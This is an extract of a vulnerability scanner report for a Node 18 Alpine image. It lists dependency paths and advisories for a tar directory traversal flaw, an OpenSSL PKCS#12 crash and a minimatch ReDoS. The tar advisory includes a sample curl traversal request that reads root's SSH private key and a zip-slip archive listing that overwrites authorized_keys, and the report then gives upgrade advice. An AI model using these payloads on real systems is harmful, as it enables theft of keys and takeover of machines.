  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
+ +
+ +
+ +

Overview

+

tar is a full-featured Tar for Node.js.

+

Affected versions of this package are vulnerable to Directory Traversal via the extract() function. An attacker can read or write files outside the intended extraction directory by causing the application to extract a malicious archive containing a chain of symlinks leading to a hardlink, which bypasses path validation checks.

+

Details

+

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

+

Directory Traversal vulnerabilities can be generally divided into two types:

+
    +
  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
    • +
+

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

+

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

+ 
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
+
+

Note %2e is the URL encoded version of . (dot).

+
    +
  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.
    • +
+

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

+

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

+ 
2018-04-15 22:04:29 .....           19           19  good.txt
+        2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys
+
+

Remediation

+

Upgrade tar to version 7.5.8 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-69421

+
+ +
+
+ high severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer + dereference in the PKCS12_item_decrypt_d2i_ex() function.

+

Impact summary: A NULL pointer dereference can trigger a crash which leads to + Denial of Service for an application processing PKCS#12 files.

+

The PKCS12_item_decrypt_d2i_ex() function does not check whether the oct + parameter is NULL before dereferencing it. When called from + PKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can + be NULL, causing a crash. The vulnerability is limited to Denial of Service + and cannot be escalated to achieve code execution or memory disclosure.

+

Exploiting this issue requires an attacker to provide a malformed PKCS#12 file + to an application that processes it. For that reason the issue was assessed as + Low severity according to our Security Policy.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, + as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

Regular Expression Denial of Service (ReDoS)

+
+ +
+
+ high severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Vulnerable module: + + minimatch +
    • + +
  • Introduced through: + + + lib@*, npm@10.8.2 and others +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + init-package-json@6.0.3 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
